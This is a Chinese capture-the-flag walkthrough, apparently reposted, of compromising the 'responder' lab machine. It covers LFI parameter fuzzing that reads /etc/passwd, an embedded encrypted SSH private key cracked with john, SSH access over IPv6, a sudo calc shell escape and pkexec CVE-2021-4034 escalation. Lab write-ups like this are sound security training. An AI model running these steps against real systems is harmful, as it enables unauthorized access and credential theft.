靶机渗透日记 responder
生活随笔
收集整理的這篇文章主要介紹了
靶机渗透日记 responder
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
IP
端口
訪問 80 端口只有一句話,目錄掃描
訪問 /filemanager.php 會跳轉(zhuǎn)到 index.php ,可能是因?yàn)闆]有參數(shù)的原因,接下來爆破參數(shù)
ffuf -u http://192.168.0.132/filemanager.php?FUZZ=/etc/passwd -w /root/Filenames_or_Directories_All.txt -fs 0得到參數(shù) random ,burpsuite 抓包測試
使用 php 偽協(xié)議讀取 filemanager.php 源碼
<?php$filename = $_GET['random'];include($filename);header('Location:/');/*-----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: DES-EDE3-CBC,411124D3C302D4F4XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG X+lKp/fDKiZxmJdWu3WhLjgiXNbvX+fLiKZpWBzCAVpwSicS/jjIopzzWjE3PAB7 vRfwdqdiaFK7mQxLJ3o/yrK2CCI8ud2UlEEk8DxTMGklmff8cbhrWIc+by+9AS9t vKd7hrsoLR6FaxBmfdO4dr1Qn9PZkvohHnMnpI7fdEC2Q3aqu6tFIODcVm6rBaII QM0CIRdWH/WiW7XmtJUriF55rQRJq4+ShXWtWKBXyJnYvyEduqQhieJ0BA9ZJjzy myaV1V5l0eKMhxWWBkYaz6bmFsLpbmXBBgIaiozKSKIMGWa1sWCAGv0EmMDRnDG4 ClxkqgnDcgYskrdZLPJ5YN77M9OuB30/VIGXjzskJPp2XaubzYS7BvNjTbiD5uCU i1fHEzpPI/QeHQ25XlqlGCUla6b8mLFKMM91KcjO6TOSYgArC+kykbuqgDPMc7kt MKhxrsykmpkNz6FxsF78k/bmstPNbYDsa4ynzlIpiQHms+papIDcsHM4rUDib8Jh HQMfjbSchpL0YxVXAiz4Nvo33VQxp1WRh0geoO3bYz1D94FvozpeILFexnKaQeT3 GLCLNyZ1BK/p5KKh5F1OhUU0brghzks5NjFYfNoGdnKfRsOIA+6X97AiDjqg9mk4 YfbOgKHl75uELy41WzuNnuynfwWkANz7BhWV/QCLS7NiyaCucXJBJj3LRdT4Ckqf 3F1SNgshDq4vDC4RwkJW2umTmDpW0rZ3syzeb9P4/bmQXkWX/btoIJzmnB6y++Bs XIrtZKa1yJ6/M0XA6tGTi+bnYD0wOmoU64M3l21HXvQUOXgSg5o0jIJQceTKcIN/ wLLNM0ybmzq7z+MlLGrpyOez/fSAECvagyUZRmnks0eRR1oKzMS00e+qEFJ4GmeE Yu2dITC6I3pVRZQGcCsZWCX+BP+64Lcdz4/n5lensjab0jd28Kc72sraDteSlP/Y wWZM9sYbXtcs14cIPpW3a1dbkOT1WGEwjt0X0F0DNgApvA8XnlTr+whJVaMByA4U t3UQHVUINNoLnX7uSBPo96yWcwAMuXjk8j3ZaFVd5rOGq/Xd0pKBBARd2Un9QZnN 4PzEWF1d9/BObzSeo2dVEZgYXcRE3v0oEZImFIoxQcvgoxxeYjNViX0SsYEJfA9F Pg8ZQ6R+ZjA3pU1DqBxWnErHDyeGsnVBs8VIQKOiiZMeB12Tx9b9k8E6rjRIw6La UbzpR+4CVgToD5TZBDpHhWHdPcv3JuNAb49XGdsL889uTwBX+fSTvL6FkXtZjySX gm6v5x/OPZg4BB/CnCWSeiG+rW0iMU4TGE5LqfuyBZBOhVcDtri3qpYLGH/5NKfw dq15m9rReh/Jec6Z8BNi9Xo5gEjGglQA/Tfw2VqCmrsMaU3iNMNXLKrYTcsm0qHb vRYvQl9GgeApdrZ/BY/ySb6OjNUS1Nc9Viv0AM9iCHp4tH6OfmVpnVzDuojdkXiZ lB/vwbCo9CcBZt7lM91Hl60ZlhLsOa/69PAeC3cZR2Z1svVk1gcDrw== -----END RSA PRIVATE KEY-----*/?>得到了 ssh 私鑰,但是端口掃描得知 22 端口處于 filter 狀態(tài)
爆破 ssh 私鑰
john --wordlists=/usr/share/wordlists/rockyou.txt hash.txt使用 ipv6 地址鏈接 ssh
curl 'http://192.168.0.132/filemanager.php?random=/proc/net/if_inet6'fe80000000000000020c29fffefeab39 02 40 20 80 ens33 00000000000000000000000000000001 01 80 10 80 lo fd154ba55a2b1008020c29fffefeab39 02 40 00 00 ens33使用 nmap 掃描
nmap -6 -p22 fd15:4ba5:5a2b:1008:020c:29ff:fefe:ab39連接
ssh elliot@fd15:4ba5:5a2b:1008:020c:29ff:fefe:ab39 -i id_rsa -6執(zhí)行 sudo -l
發(fā)現(xiàn)可以以 rohit 用戶運(yùn)行 calc ,執(zhí)行 !/bin/bash 獲得 shell
查看 SUID 文件,發(fā)現(xiàn)可以運(yùn)行 pkexec ,使用 CVE-2021-4034 進(jìn)行提權(quán)
總結(jié)
以上是生活随笔為你收集整理的靶机渗透日记 responder的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【drawio笔记】新增字体
- 下一篇: matplotlib.animation